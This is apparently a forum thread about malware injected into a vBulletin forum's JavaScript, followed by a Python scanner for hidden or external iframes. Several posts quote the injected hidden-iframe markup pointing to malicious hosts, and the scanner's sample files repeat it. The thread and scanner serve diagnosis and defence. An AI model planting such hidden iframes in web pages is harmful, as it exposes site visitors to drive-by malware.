Thread: Forum malware injected? avast warning

#1 schnaader (Programmer, Hessen, Germany)

    Every time I visit the encode.ru main page or any subpage, avast is warning me about a malware URL "http://kokosina.in/t/go.php?sid=5" - this seems to be some JavaScript spreading in vBulletin forums recently, but it's quite new, so there's no further information about what it is or how to handle/remove it.

    Looking at the site's source and JS, "http://encode.ru/clientscript/yui/connection/connection-min.js" looks quite suspicious, but could also be just some normal minified JS.
    http://schnaader.info
    Damn kids. They're all alike.

#2 osmanturan (Programmer, Mersin, Turkiye)
    I've confirmed that with an HTTP proxy (Fiddler). Something tries to connect first to "http://kokosina.in/t/go.php?sid=5" and then to several addresses at 109.236.82.79. And there are two attempts to download Java applications, which are located at "109.236.82.79/vukavuka.class" and "109.236.82.79/vukavuka/class.class". Microsoft Security Essentials blocked all of the attacks. I'm trying to investigate the problem currently. I'll inform you when I find something.
    BIT Archiver homepage: www.osmanturan.com

#3 osmanturan (Programmer, Mersin, Turkiye)
    @schnaader: You're right. The problem is caused by "http://encode.ru/clientscript/yui/connection/connection-min.js". It seems a typical "iframe" virus. It manipulates the DOM by creating an iframe tag to connect somewhere. The odd thing is that most iframe viruses put their signature at the end of JavaScript files, but this one is placed at the top of a special script. I didn't bother to de-obfuscate the injected code, but I can say that it patches YUI to be able to execute, because the injected code is not invoked alone. It seems it's especially designed for vBulletin.
    BIT Archiver homepage: www.osmanturan.com

#4 Member (France)
    Malware presence confirmed on my side

#5 Matt Mahoney (Expert, Melbourne, Florida, USA)
    McAfee seems unaware of the problem. http://www.siteadvisor.com/sites/http%3A//encode.ru

#6 Member (Kraków, Poland)
    What does that malware do? Which browsers are affected (maybe Chrome and IE9 aren't, because of sandboxing)? Which OSes are affected?

#7 Black_Fox (Tester, Czechia)
    Chrome+Avast here, no malicious activity detected.
    I am... Black_Fox... my discontinued benchmark
    "No one involved in computers would ever say that a certain amount of memory is enough for all time? I keep bumping into that silly quotation attributed to me that says 640K of memory is enough. There's never a citation; the quotation just floats like a rumor, repeated again and again." -- Bill Gates

#8 osmanturan (Programmer, Mersin, Turkiye)
    @Piotr: It's not a browser-specific infection. The malicious code creates an iframe tag to download and run Java code. Only if your browser asks to run it can it be caught. On the other hand, the target URL looks dead (well, specifically the redirected URL). As a result, the connection can't be established. In other words, the malicious code relies on a dead link.
    BIT Archiver homepage: www.osmanturan.com

#9 Member (England)
    Very annoying, if this even posts. I get these warnings, the Java plugin error in Opera 10.10, and the Avira one pops up in 11.52. I can't even type crap in or do anything in O10.10 with this "malware"; I'm having to type this in Metapad and then paste it in. Check out the screenshots, and have you noticed how many guests are online? O.o
    Attachments: encode_ru-problem.png (54.6 KB), Avira_Warning.png (74.3 KB)

#10 Shelwien (Administrator, Kharkov, Ukraine)
    This really looks like malware in scripts on the server.
    Unfortunately I don't have a server login and it's a little hard for me to fix it; I have to wait for encode/webmaster to notice.
    The script adds
    Code:
    <div style="display:none;"><iframe src="http://kokosina.in/t/go.php?sid=5" width="38" height="67" border="0" frameborder="0"></iframe></div>
    to the page code for some browsers. That loads and decrypts some JavaScript, which in turn tries to load a Java plugin and does other stuff.
    Anyway, a proposed fix for now is to add
    Code:
    127.0.0.1 kokosina.in
    to C:\WINDOWS\system32\drivers\etc\hosts
    Update: redirected to a clean copy for now. Encode, webmaster, please fix this anyway.

#11 webmaster (Saint-Petersburg, Russia)
    Fixed. A vulnerability in the forum scripts. The updated version will be up tonight.

#12 webmaster (Saint-Petersburg, Russia)
    Done.

#13 Fallon (Member, Europe - The Netherlands)
    Reported to Avast User Forum.
    http://forum.avast.com/index.php?topic=90437.0
    Reason for this alert is an outdated vBulletin version, which is open to an exploit.
    That's what they said.
    Fixed, at least for Avast.
    Well, and by the webmaster, now.

#14 Shelwien (Administrator, Kharkov, Ukraine)
    I just deleted some
    Code:
    <div style='display:none'><iframe width='9' height='6' src='http://mavmor.in/loop.php'
    from a forum template ("footer").

#15 Member (Kraków, Poland)
    Looks like you've done something wrong as I see "frameborder='0' scrolling='no'>" on every (or many at least) page at the bottom.
    Chromium 18 on Ubuntu.

#16 Shelwien (Administrator, Kharkov, Ukraine)
    I noticed that too, but decided to keep it like that in the hope that the webmaster would notice sooner.
    Not sure why this server is getting hacked so frequently... it's not the forum itself, I think -
    at least the template modification didn't appear in the edit history.
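The thread's two findings, a hidden iframe written by an injected script (posts #3 and #10) and a half-deleted iframe fragment left in the footer template (posts #14 and #15), are both things a site owner can check for mechanically. The scanner below is an added example and is not code from this thread, from vBulletin or from encode.ru; it assumes the web root has been read into a path-to-content mapping, that `encode.ru` is the only host allowed to appear as an iframe source, and it runs over constructed sample files modelled on the markup quoted in the thread.

```python
import re
from urllib.parse import urlparse

# Constructed sample input (not files from the real server): a minified JS file
# carrying an injected hidden-iframe writer, like the one the thread found in
# connection-min.js; a footer template left with a dangling iframe fragment
# after a partial cleanup; and a clean header with a same-origin iframe.
SAMPLE_FILES = {
    "clientscript/yui/connection/connection-min.js":
        "document.write('<div style=\"display:none;\"><iframe "
        "src=\"http://kokosina.in/t/go.php?sid=5\" width=\"38\" height=\"67\" "
        "border=\"0\" frameborder=\"0\"></iframe></div>');var YAHOO=YAHOO||{};",
    "templates/footer.html":
        "<div id=\"footer\">Powered by vBulletin</div>\n"
        " frameborder='0' scrolling='no'></iframe></div>\n",
    "templates/header.html":
        "<iframe src=\"/forum/banner.html\" width=\"468\" height=\"60\"></iframe>",
}

# Hosts allowed to appear as iframe sources (assumption); everything else is reported.
TRUSTED_HOSTS = {"encode.ru", "www.encode.ru"}

IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.I)
IFRAME_CLOSE = re.compile(r"</iframe>", re.I)
IFRAME_SRC = re.compile(r"\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.I)
HIDDEN_WRAPPER = re.compile(r"<div\b[^>]*display\s*:\s*none[^>]*>\s*<iframe\b", re.I)
SCRIPT_WRITER = re.compile(r"document\.write\s*\(.*<iframe", re.I | re.S)
FRAGMENT_ATTRS = re.compile(r"\b(frameborder|scrolling)\s*=", re.I)


def scan_text(path, text):
    """Return a list of (path, kind, detail) findings for one file's content."""
    findings = []
    if HIDDEN_WRAPPER.search(text):
        findings.append((path, "hidden_iframe", "iframe inside a display:none container"))
    if path.endswith(".js") and SCRIPT_WRITER.search(text):
        findings.append((path, "script_writes_iframe", "document.write() emits an iframe"))
    for tag in IFRAME_TAG.finditer(text):
        m = IFRAME_SRC.search(tag.group(0))
        if not m:
            continue
        host = urlparse(m.group(1)).hostname
        # Relative sources have no host and are same-origin; absolute ones must be trusted.
        if host and host.lower() not in TRUSTED_HOSTS:
            findings.append((path, "external_iframe", host.lower()))
    # A closing tag without an opening one, or iframe attributes that survive once
    # every well-formed <iframe ...> tag is removed, point to a partially deleted tag.
    opens = len(IFRAME_TAG.findall(text))
    closes = len(IFRAME_CLOSE.findall(text))
    leftover = IFRAME_TAG.sub("", text)
    if closes > opens or FRAGMENT_ATTRS.search(leftover):
        findings.append((path, "dangling_iframe_fragment", "iframe attributes or </iframe> without an opening tag"))
    return findings


def scan_files(files):
    """Scan a {path: content} mapping and return all findings, ordered by path."""
    findings = []
    for path in sorted(files):
        findings.extend(scan_text(path, files[path]))
    return findings


def suspicious_hosts(findings):
    """Distinct external iframe hosts, e.g. to feed a hosts-file or proxy block list."""
    return sorted({detail for _, kind, detail in findings if kind == "external_iframe"})


if __name__ == "__main__":
    results = scan_files(SAMPLE_FILES)
    for path, kind, detail in results:
        print(f"{path}: {kind}: {detail}")
    print("hosts to block:", suspicious_hosts(results))
```

Run against a real web root, replace `SAMPLE_FILES` with the contents of every `.js`, `.php` and template file; the `external_iframe` host list is what a hosts-file entry like the one in post #10 would block, and `dangling_iframe_fragment` catches exactly the leftover `frameborder='0' scrolling='no'>` text post #15 saw after a manual edit. A regex scanner like this only finds plain-text iframes; code that is obfuscated or assembled at runtime needs a diff against a known-clean copy of the forum files instead.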
